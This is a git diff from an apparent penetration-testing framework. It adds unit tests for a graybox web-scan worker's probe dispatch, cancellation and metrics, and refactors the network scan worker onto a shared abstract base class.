self.assertEqual(stored["outcome"], "completed") + self.assertEqual(len(stored["findings"]), 1) + + def test_store_findings_persists_typed_probe_artifacts(self): + worker = _make_worker() + finding = GrayboxFinding( + scenario_id="TEST-ART", + title="Artifact result", + status="inconclusive", + severity="INFO", + owasp="A01:2021", + ) + run_result = GrayboxProbeRunResult( + findings=[finding], + artifacts=[ + GrayboxEvidenceArtifact( + summary="GET /admin -> 403", + request_snapshot="GET /admin", + response_snapshot="403 Forbidden", + raw_evidence_cid="QmArtifact", + ), + ], + 
outcome="completed", + ) + + worker._store_findings("_typed_probe", run_result) + + stored = worker.state["graybox_results"]["8000"]["_typed_probe"] + self.assertEqual(stored["artifacts"][0]["summary"], "GET /admin -> 403") + self.assertEqual(stored["artifacts"][0]["raw_evidence_cid"], "QmArtifact") + + def test_registered_probe_accepts_typed_probe_definition(self): + worker = _make_worker() + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth.ensure_sessions = MagicMock(return_value=True) + worker.auth._auth_errors = [] + probe_context = worker._build_probe_kwargs(DiscoveryResult()) + finding = GrayboxFinding( + scenario_id="TEST-02", + title="Registry typed", + status="not_vulnerable", + severity="INFO", + owasp="A01:2021", + ) + mock_probe = MagicMock() + mock_probe.run.return_value = GrayboxProbeRunResult(findings=[finding], outcome="completed") + mock_cls = MagicMock(return_value=mock_probe) + mock_cls.requires_regular_session = False + mock_cls.requires_auth = True + mock_cls.is_stateful = False + + with patch.object(worker, "_import_probe", return_value=mock_cls): + worker._run_registered_probe( + GrayboxProbeDefinition(key="_typed", cls_path="fake.Probe"), + probe_context, + ) + + stored = worker.state["graybox_results"]["8000"]["_typed"] + self.assertEqual(stored["outcome"], "completed") + self.assertEqual(worker.metrics.build().probe_breakdown["_typed"], "completed") + + def test_auth_failure_aborts(self): + """Official login fails → fatal finding, done=True.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = False + worker.auth.official_session = None + worker.auth._auth_errors = ["Login failed"] + worker.auth.cleanup = MagicMock() + + worker.execute_job() + + self.assertTrue(worker.state["done"]) + results = worker.state["graybox_results"] + fatal = results.get("8000", 
{}).get("_graybox_fatal", {}).get("findings", []) + self.assertEqual(len(fatal), 1) + self.assertEqual(fatal[0]["status"], "inconclusive") + self.assertIn("authentication failed", fatal[0]["evidence"][0].lower()) + + def test_preflight_failure_aborts(self): + """Bad URL → fatal finding, done=True.""" + worker = _make_worker() + worker.safety.validate_target.return_value = "Target not authorized" + worker.auth.cleanup = MagicMock() + + worker.execute_job() + + self.assertTrue(worker.state["done"]) + fatal = worker.state["graybox_results"].get("8000", {}).get("_graybox_fatal", {}).get("findings", []) + self.assertEqual(len(fatal), 1) + + def test_cancel_before_discovery(self): + """Routes/forms default to [] when canceled before discovery.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.cleanup = MagicMock() + + # Cancel after auth + worker.state["canceled"] = True + + worker.execute_job() + self.assertTrue(worker.state["done"]) + + def test_cancel_stops_probes(self): + """stop() skips remaining probes.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + call_count = [0] + original_import = GrayboxLocalWorker._import_probe + + def counting_import(cls_path): + call_count[0] += 1 + if call_count[0] >= 2: + worker.state["canceled"] = True + return original_import(cls_path) + + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(counting_import)): + 
worker.execute_job() + + self.assertTrue(worker.state["done"]) + + def test_cleanup_always_runs(self): + """Sessions closed even on error.""" + worker = _make_worker() + worker.safety.validate_target.side_effect = RuntimeError("boom") + worker.safety.sanitize_error.return_value = "boom" + worker.auth.cleanup = MagicMock() + + worker.execute_job() + + worker.auth.cleanup.assert_called_once() + self.assertTrue(worker.state["done"]) + + +class TestProbeDispatch(unittest.TestCase): + + def test_probe_kwargs_include_forms(self): + """discovered_forms passed to probes.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = (["/route1/"], ["/form1/"]) + + probe_instances = [] + + def mock_registry_probe(**kwargs): + mock_probe = MagicMock() + mock_probe.run.return_value = [] + probe_instances.append(kwargs) + return mock_probe + + mock_cls = MagicMock(side_effect=mock_registry_probe) + mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_test", "cls": "test.TestProbe"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: mock_cls)): + worker.execute_job() + + self.assertTrue(len(probe_instances) > 0) + self.assertEqual(probe_instances[0]["discovered_forms"], ["/form1/"]) + + def test_excluded_features_skips_probes(self): + """'graybox' in excluded → no probes run.""" + worker = _make_worker(excluded_features=["graybox"]) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = 
None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + with patch.object(GrayboxLocalWorker, '_import_probe') as mock_import: + worker.execute_job() + mock_import.assert_not_called() + + def test_excluded_probe_key_skips_only_that_probe(self): + """Per-probe exclusions suppress only the disabled graybox probe.""" + worker = _make_worker(excluded_features=["_graybox_injection"]) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + imported = [] + mock_probe = MagicMock() + mock_probe.run.return_value = [] + mock_cls = MagicMock(return_value=mock_probe) + mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + + def track_import(cls_path): + imported.append(cls_path) + return mock_cls + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", [ + {"key": "_graybox_injection", "cls": "inj.Probe"}, + {"key": "_graybox_access_control", "cls": "acc.Probe"}, + ]): + with patch.object(GrayboxLocalWorker, "_import_probe", staticmethod(track_import)): + worker.execute_job() + + self.assertEqual(imported, ["acc.Probe"]) + metrics = worker.get_status()["scan_metrics"] + self.assertEqual(metrics["probe_breakdown"]["_graybox_injection"], "skipped:disabled") + self.assertEqual(metrics["probe_breakdown"]["_graybox_access_control"], "completed") + + def 
test_excluded_weak_auth_probe_records_skip(self): + """Weak-auth probe is skipped cleanly when disabled by feature control.""" + worker = _make_worker( + weak_candidates=["admin:admin"], + excluded_features=["_graybox_weak_auth"], + ) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.BusinessLogicProbes") as mock_probe: + worker.execute_job() + mock_probe.assert_not_called() + + metrics = worker.get_status()["scan_metrics"] + self.assertEqual(metrics["probe_breakdown"]["_graybox_weak_auth"], "skipped:disabled") + + def test_get_worker_specific_result_fields(self): + """Includes graybox_results.""" + fields = GrayboxLocalWorker.get_worker_specific_result_fields() + self.assertIn("graybox_results", fields) + self.assertEqual(fields["graybox_results"], dict) + + def test_ports_scanned_aggregation_type(self): + """ports_scanned uses list aggregation type.""" + fields = GrayboxLocalWorker.get_worker_specific_result_fields() + self.assertEqual(fields["ports_scanned"], list) + + def test_probe_error_isolation(self): + """One probe crash doesn't kill the scan.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + worker.safety.sanitize_error.return_value = "test error" + + crash_cls = 
MagicMock(side_effect=RuntimeError("probe crashed")) + crash_cls.is_stateful = False + crash_cls.requires_auth = False + crash_cls.requires_regular_session = False + + ok_cls = MagicMock() + ok_probe = MagicMock() + ok_probe.run.return_value = [GrayboxFinding( + scenario_id="OK-1", title="OK", status="not_vulnerable", + severity="INFO", owasp="", + )] + ok_cls.return_value = ok_probe + ok_cls.is_stateful = False + ok_cls.requires_auth = False + ok_cls.requires_regular_session = False + + imports = iter([crash_cls, ok_cls]) + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_crash", "cls": "crash.CrashProbe"}, {"key": "_ok", "cls": "ok.OkProbe"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: next(imports))): + worker.execute_job() + + self.assertTrue(worker.state["done"]) + # Crash probe recorded error finding + crash_findings = worker.state["graybox_results"]["8000"]["_crash"]["findings"] + self.assertEqual(len(crash_findings), 1) + self.assertEqual(crash_findings[0]["status"], "inconclusive") + # OK probe still ran + ok_findings = worker.state["graybox_results"]["8000"]["_ok"]["findings"] + self.assertEqual(len(ok_findings), 1) + metrics = worker.get_status()["scan_metrics"] + self.assertEqual(metrics["probe_breakdown"]["_crash"], "failed") + self.assertEqual(metrics["probe_breakdown"]["_ok"], "completed") + self.assertEqual(metrics["probes_failed"], 1) + self.assertEqual(metrics["probes_completed"], 1) + + def test_probe_error_records_finding(self): + """Crashed probe emits inconclusive finding.""" + worker = _make_worker() + worker.safety.sanitize_error.return_value = "sanitized error" + worker._record_probe_error("_test_probe", RuntimeError("fail")) + findings = worker.state["graybox_results"]["8000"]["_test_probe"]["findings"] + self.assertEqual(len(findings), 1) + self.assertEqual(findings[0]["status"], "inconclusive") + self.assertIn("sanitized error", 
findings[0]["evidence"][0]) + + def test_verify_tls_false_emits_warning(self): + """TLS disabled → preflight finding.""" + worker = _make_worker(verify_tls=False) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", []): + worker.execute_job() + + preflight = worker.state["graybox_results"]["8000"].get("_graybox_preflight", {}).get("findings", []) + self.assertEqual(len(preflight), 1) + self.assertEqual(preflight[0]["scenario_id"], "PREFLIGHT-TLS") + self.assertEqual(preflight[0]["severity"], "LOW") + + def test_probe_registry_iteration(self): + """Probes loaded from GRAYBOX_PROBE_REGISTRY.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + imported_paths = [] + + def tracking_import(cls_path): + imported_paths.append(cls_path) + mock_cls = MagicMock() + mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + mock_probe = MagicMock() + mock_probe.run.return_value = [] + mock_cls.return_value = mock_probe + return mock_cls + + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(tracking_import)): + worker.execute_job() + + # Should have imported all registry entries + expected = [entry["cls"] for entry in GRAYBOX_PROBE_REGISTRY] + 
self.assertEqual(imported_paths, expected) + + def test_capability_introspection(self): + """Worker reads probe_cls.is_stateful, not registry dict.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + mock_cls = MagicMock() + mock_cls.is_stateful = True # Stateful + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + mock_probe = MagicMock() + mock_probe.run.return_value = [] + mock_cls.return_value = mock_probe + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_stateful", "cls": "test.StatefulProbe"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: mock_cls)): + worker.execute_job() + + # Probe was skipped (stateful disabled by default) + skip = worker.state["graybox_results"]["8000"].get("_stateful", {}).get("findings", []) + self.assertEqual(len(skip), 1) + self.assertEqual(skip[0]["status"], "inconclusive") + self.assertIn("stateful_probes_disabled", skip[0]["evidence"][0]) + + def test_capability_skip_no_regular(self): + """Probe requiring regular_session skipped when no regular session.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = None # No regular session + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + mock_cls = MagicMock() + 
mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = True + mock_probe = MagicMock() + mock_probe.run.return_value = [] + mock_cls.return_value = mock_probe + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_needs_regular", "cls": "test.NeedsRegular"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: mock_cls)): + worker.execute_job() + + # Probe was silently skipped (no finding, no error) + self.assertNotIn("_needs_regular", worker.state["graybox_results"].get("8000", {})) + + def test_capability_skip_stateful(self): + """Stateful probe emits skip finding when disabled.""" + worker = _make_worker(allow_stateful_probes=False) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + mock_cls = MagicMock() + mock_cls.is_stateful = True + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_stateful_probe", "cls": "test.Stateful"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: mock_cls)): + worker.execute_job() + + skip = worker.state["graybox_results"]["8000"].get("_stateful_probe", {}).get("findings", []) + self.assertEqual(len(skip), 1) + self.assertIn("stateful_probes_disabled=True", skip[0]["evidence"]) + + def test_import_probe(self): + """_import_probe resolves cls_path to class.""" + cls = GrayboxLocalWorker._import_probe("access_control.AccessControlProbes") + from 
extensions.business.cybersec.red_mesh.graybox.probes.access_control import AccessControlProbes + self.assertIs(cls, AccessControlProbes) + + def test_weak_auth_direct_import(self): + """BusinessLogicProbes used directly for weak auth, not via registry.""" + worker = _make_worker(weak_candidates=["admin:admin"]) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", []): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.BusinessLogicProbes") as mock_bl: + mock_instance = MagicMock() + mock_instance.run_weak_auth.return_value = [] + mock_bl.return_value = mock_instance + worker.execute_job() + + mock_bl.assert_called_once() + mock_instance.run_weak_auth.assert_called_once() + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/web_mixin.py b/extensions/business/cybersec/red_mesh/web_mixin.py deleted file mode 100644 index 61b2dcc5..00000000 --- a/extensions/business/cybersec/red_mesh/web_mixin.py +++ /dev/null @@ -1,14 +0,0 @@ -from .web_discovery_mixin import _WebDiscoveryMixin -from .web_hardening_mixin import _WebHardeningMixin -from .web_api_mixin import _WebApiExposureMixin -from .web_injection_mixin import _WebInjectionMixin - - -class _WebTestsMixin( - _WebDiscoveryMixin, - _WebHardeningMixin, - _WebApiExposureMixin, - _WebInjectionMixin, -): - """Backward-compatible combined mixin -- prefer importing individual mixins.""" - pass diff --git a/extensions/business/cybersec/red_mesh/worker/__init__.py b/extensions/business/cybersec/red_mesh/worker/__init__.py new file 
mode 100644 index 00000000..91477511 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/__init__.py @@ -0,0 +1,5 @@ +from .base import BaseLocalWorker +from .pentest_worker import PentestLocalWorker +from .metrics_collector import MetricsCollector + +__all__ = ["BaseLocalWorker", "PentestLocalWorker", "MetricsCollector"] diff --git a/extensions/business/cybersec/red_mesh/worker/base.py b/extensions/business/cybersec/red_mesh/worker/base.py new file mode 100644 index 00000000..7abc8aef --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/base.py @@ -0,0 +1,197 @@ +""" +Abstract base for all RedMesh scan workers. + +Defines the contract that pentester_api_01.py relies on: +threading model, state shape, status reporting, and metrics. +PentestLocalWorker (network) and GrayboxLocalWorker (webapp) both +inherit from this class. +""" + +import threading +import uuid +from abc import ABC, abstractmethod + +from .metrics_collector import MetricsCollector + + +class BaseLocalWorker(ABC): + """ + Abstract base class for scan workers. 
+ + Subclasses MUST: + - Call super().__init__() to initialize shared state + - Implement execute_job() with the scan pipeline + - Implement get_status() for aggregation + - Implement get_worker_specific_result_fields() for aggregation + - Set self.initial_ports in __init__ before start() is called + - Initialize self.state with at minimum the required keys (see below) + + The API (pentester_api_01.py) accesses: + - self.thread.is_alive() to check completion + - self.stop_event.is_set() to check cancellation + - self.state["done"] / self.state["canceled"] for status + - self.initiator for job routing + - self.local_worker_id as dict key in scan_jobs + - self.initial_ports for port count in progress + - self.metrics.build().to_dict() for live metrics + - self.get_status() for report aggregation + - self.start() / self.stop() for lifecycle + + State dict required keys (subclass must include all of these): + done: bool, canceled: bool, open_ports: list[int], + ports_scanned: list[int], completed_tests: list[str], + service_info: dict, web_tests_info: dict, port_protocols: dict, + correlation_findings: list + """ + + def __init__( + self, + owner, + job_id: str, + initiator: str, + local_id_prefix: str, + target: str, + ): + """ + Initialize shared worker state. + + Parameters + ---------- + owner : object + Parent object providing logger P(). + job_id : str + Job identifier. + initiator : str + Network address that announced the job. + local_id_prefix : str + Prefix for human-readable worker ID. The full ID is + "RM-{prefix}-{uuid4[:4]}" and is used as the dict key in + scan_jobs[job_id]. Both PentestLocalWorker and + GrayboxLocalWorker use this same attribute name. + target : str + Scan target (IP for network, hostname for webapp). 
+ """ + self.owner = owner + self.job_id = job_id + self.initiator = initiator + self.target = target + self.local_worker_id = "RM-{}-{}".format( + local_id_prefix, str(uuid.uuid4())[:4] + ) + + # Threading — set by start(), checked by API + self.thread: threading.Thread | None = None + self.stop_event: threading.Event | None = None + + # Metrics — accessed by _publish_live_progress via + # worker.metrics.build().to_dict() + self.metrics = MetricsCollector() + + # Subclass MUST set self.initial_ports in __init__ before start(). + # _publish_live_progress reads len(self.initial_ports). + self.initial_ports: list[int] = [] + + # Subclass MUST initialize self.state with at minimum the required keys. + # The base class does NOT pre-populate — each subclass builds its + # own state dict with scan-type-specific keys on top of these. + self.state: dict = {} + + def start(self): + """ + Create thread and stop_event, start execute_job in background. + + Called by pentester_api_01.py after construction. + """ + self.stop_event = threading.Event() + self.thread = threading.Thread(target=self.execute_job, daemon=True) + self.thread.start() + + def stop(self): + """ + Signal the worker to stop. + + Called by _check_running_jobs, stop_and_delete_job, hard stop. + Sets stop_event so _check_stopped() returns True. + Also sets state["canceled"] for backward compat with code that + reads the flag directly instead of checking stop_event. + + Ordering guarantee: stop_event is set BEFORE state["canceled"]. + This ensures _check_stopped() sees the stop signal even if + there's a context switch between the two assignments. The GIL + makes dict writes atomic, so state["canceled"] is always + consistent. + """ + self.P(f"Stop requested for job {self.job_id} on worker {self.local_worker_id}") + if self.stop_event: + self.stop_event.set() + self.state["canceled"] = True + + def _check_stopped(self) -> bool: + """ + Check whether the worker should cease execution. 
+ + Returns True if done or stop_event is set or canceled flag is set. + Subclasses call this between phases to support graceful cancellation. + """ + if self.state.get("done", False): + return True + if self.state.get("canceled", False): + return True + if self.stop_event is not None and self.stop_event.is_set(): + return True + return False + + @abstractmethod + def execute_job(self) -> None: + """ + Run the scan pipeline. Called on the worker thread. + + Subclass MUST: + - Set self.state["done"] = True when finished (in finally block) + - Set self.state["canceled"] = True if _check_stopped() was True + - Call self.metrics.start_scan() at the beginning + - Call self.metrics.phase_start/phase_end for each phase + - Append phase markers to self.state["completed_tests"] + """ + ... + + @abstractmethod + def get_status(self, for_aggregations: bool = False) -> dict: + """ + Return a status snapshot for aggregation. + + Called by _maybe_close_jobs, _close_job, get_test_status. + + The returned dict MUST include: + - job_id, initiator, target + - open_ports (list), ports_scanned, completed_tests (list) + - service_info (dict), web_tests_info (dict), port_protocols (dict) + - correlation_findings (list) + - scan_metrics (dict from self.metrics.build().to_dict()) + + If not for_aggregations: + - local_worker_id, progress, done, canceled + """ + ... + + @staticmethod + @abstractmethod + def get_worker_specific_result_fields() -> dict: + """ + Define aggregation strategy per result field. + + Called by _get_aggregated_report to know how to merge results + from multiple workers of the same job. + + Returns dict mapping field name to aggregation type/callable: + - list: union (deduplicate + sort) + - dict: deep merge + - sum: sum values + - min/max: take min/max + """ + ... 
+ + def P(self, s, **kwargs): + """Log a message with worker context prefix.""" + s = f"[{self.local_worker_id}:{self.target}] {s}" + self.owner.P(s, **kwargs) diff --git a/extensions/business/cybersec/red_mesh/correlation_mixin.py b/extensions/business/cybersec/red_mesh/worker/correlation.py similarity index 99% rename from extensions/business/cybersec/red_mesh/correlation_mixin.py rename to extensions/business/cybersec/red_mesh/worker/correlation.py index 1f77d97c..d79c99d4 100644 --- a/extensions/business/cybersec/red_mesh/correlation_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/correlation.py @@ -8,7 +8,7 @@ import ipaddress -from .findings import Finding, Severity, probe_result +from ..findings import Finding, Severity, probe_result # Map keywords found in OS strings to normalized OS families diff --git a/extensions/business/cybersec/red_mesh/metrics_collector.py b/extensions/business/cybersec/red_mesh/worker/metrics_collector.py similarity index 98% rename from extensions/business/cybersec/red_mesh/metrics_collector.py rename to extensions/business/cybersec/red_mesh/worker/metrics_collector.py index 1f0295a7..77ef3af2 100644 --- a/extensions/business/cybersec/red_mesh/metrics_collector.py +++ b/extensions/business/cybersec/red_mesh/worker/metrics_collector.py @@ -1,7 +1,7 @@ import time import statistics -from .models.shared import ScanMetrics +from ..models.shared import ScanMetrics class MetricsCollector: @@ -160,7 +160,7 @@ def build(self) -> ScanMetrics: probes_attempted = len(self._probe_results) probes_completed = sum(1 for v in self._probe_results.values() if v == "completed") probes_skipped = sum(1 for v in self._probe_results.values() if v.startswith("skipped")) - probes_failed = sum(1 for v in self._probe_results.values() if v == "failed") + probes_failed = sum(1 for v in self._probe_results.values() if v == "failed" or v.startswith("failed:")) banner_total = self._banner_confirmed + self._banner_guessed return ScanMetrics( diff --git 
a/extensions/business/cybersec/red_mesh/pentest_worker.py b/extensions/business/cybersec/red_mesh/worker/pentest_worker.py similarity index 85% rename from extensions/business/cybersec/red_mesh/pentest_worker.py rename to extensions/business/cybersec/red_mesh/worker/pentest_worker.py index caa51f9c..4b76d669 100644 --- a/extensions/business/cybersec/red_mesh/pentest_worker.py +++ b/extensions/business/cybersec/red_mesh/worker/pentest_worker.py @@ -7,25 +7,43 @@ import traceback import time -from .service_mixin import _ServiceInfoMixin -from .correlation_mixin import _CorrelationMixin -from .constants import ( +from .base import BaseLocalWorker +from .service import _ServiceInfoMixin +from .correlation import _CorrelationMixin +from ..constants import ( PROBE_PROTOCOL_MAP, WEB_PROTOCOLS, WELL_KNOWN_PORTS as _WELL_KNOWN_PORTS, FINGERPRINT_TIMEOUT, FINGERPRINT_MAX_BANNER, FINGERPRINT_HTTP_TIMEOUT, FINGERPRINT_NUDGE_TIMEOUT, SCAN_PORT_TIMEOUT, COMMON_PORTS, ALL_PORTS, + NETWORK_FEATURE_METHODS, NETWORK_FEATURE_REGISTRY, ) -from .web_mixin import _WebTestsMixin +from .web import _WebTestsMixin -from .metrics_collector import MetricsCollector +# Note: MetricsCollector is no longer imported directly — it's initialized +# by BaseLocalWorker.__init__() via worker/base.py. 
class PentestLocalWorker( _ServiceInfoMixin, _WebTestsMixin, _CorrelationMixin, + BaseLocalWorker, ): + FEATURE_CATEGORIES = ("service", "web", "correlation") + FEATURE_CATEGORY_PREFIXES = { + "service": "_service_info_", + "web": "_web_test_", + "correlation": "_post_scan_", + } + PHASE_EXECUTION_PLAN = ( + {"phase": "port_scan", "runner": "_scan_ports_step"}, + {"phase": "fingerprint", "runner": "_active_fingerprint_ports", "completion_marker": "fingerprint_completed"}, + {"phase": "service_probes", "runner": "_gather_service_info", "completion_marker": "service_info_completed"}, + {"phase": "web_tests", "runner": "_run_web_tests", "completion_marker": "web_tests_completed", "skip_on_ics": True}, + {"phase": "correlation", "runner": "_run_correlation_tests", "completion_marker": "correlation_completed"}, + ) + """ Execute a pentest workflow against a target on a dedicated thread. @@ -111,13 +129,16 @@ def __init__( if exceptions is None: exceptions = [] - self.target = target - self.job_id = job_id - self.initiator = initiator - self.local_worker_id = "RM-{}-{}".format( - local_id_prefix, str(uuid.uuid4())[:4] + # Initialize base class — sets owner, job_id, initiator, target, + # local_worker_id, thread, stop_event, metrics, initial_ports, state + super().__init__( + owner=owner, + job_id=job_id, + initiator=initiator, + local_id_prefix=local_id_prefix, + target=target, ) - self.owner = owner + self.scan_min_delay = scan_min_delay self.scan_max_delay = scan_max_delay self.ics_safe_mode = ics_safe_mode @@ -175,7 +196,7 @@ def __init__( }, "correlation_findings": [], } - self.metrics = MetricsCollector() + # Note: self.metrics already set by super().__init__() self.__all_features = self._get_all_features() @@ -203,15 +224,51 @@ def _get_all_features(self, categs=False): dict | list Service and web test method names. 
""" - features = {} if categs else [] - PREFIXES = ["_service_info_", "_web_test_"] - for prefix in PREFIXES: - methods = [method for method in dir(self) if method.startswith(prefix)] - if categs: - features[prefix[1:-1]] = methods - else: - features.extend(methods) - return features + if categs: + return { + category: list(self.get_feature_registry().get(category, ())) + for category in self.get_feature_categories() + } + return list(self.get_feature_methods()) + + @classmethod + def get_feature_categories(cls): + """Return feature categories used by the network worker.""" + return list(cls.FEATURE_CATEGORIES) + + @classmethod + def get_feature_registry(cls): + """Return the explicit executable feature registry for network scans.""" + return {category: list(NETWORK_FEATURE_REGISTRY.get(category, ())) for category in cls.get_feature_categories()} + + @classmethod + def get_feature_methods(cls): + """Return the flattened ordered feature list for network scans.""" + return list(NETWORK_FEATURE_METHODS) + + @classmethod + def get_supported_features(cls, categs=False): + """Return supported network-worker features from the explicit registry.""" + if categs: + return cls.get_feature_registry() + return cls.get_feature_methods() + + def _get_enabled_feature_methods(self, category=None): + """Return enabled features in explicit registry order, optionally by category.""" + allowed = set(self.__enabled_features or []) + if category is None: + methods = self.get_feature_methods() + else: + methods = self.get_feature_registry().get(category, []) + enabled = [method for method in methods if method in allowed] + if category is not None: + prefix = self.FEATURE_CATEGORY_PREFIXES[category] + extras = [ + method for method in (self.__enabled_features or []) + if method not in methods and method.startswith(prefix) + ] + enabled.extend(extras) + return enabled @staticmethod def get_worker_specific_result_fields(): @@ -302,67 +359,8 @@ def get_status(self, for_aggregations=False): 
return dct_status - def P(self, s, **kwargs): - """ - Log a message with worker context prefix. - - Parameters - ---------- - s : str - Message to emit. - **kwargs - Additional logging keyword arguments. - - Returns - ------- - Any - Result of owner logger. - """ - s = f"[{self.local_worker_id}:{self.target}] {s}" - self.owner.P(s, **kwargs) - return - - - def start(self): - """ - Start the pentest job in a new thread. - - Returns - ------- - None - """ - # Event to signal early stopping - self.stop_event = threading.Event() - # Thread for running the job - self.thread = threading.Thread(target=self.execute_job, daemon=True) - self.thread.start() - return - - - def stop(self): - """ - Signal the job to stop early. - - Returns - ------- - None - """ - self.P(f"Stop requested for job {self.job_id} on worker {self.local_worker_id}") - self.stop_event.set() - return - - - def _check_stopped(self): - """ - Determine whether the worker should cease execution. - - Returns - ------- - bool - True if done or stop event set. - """ - return self.state["done"] or self.stop_event.is_set() - + # start(), stop(), _check_stopped(), P() are ALL inherited from + # BaseLocalWorker. Not redefined here. 
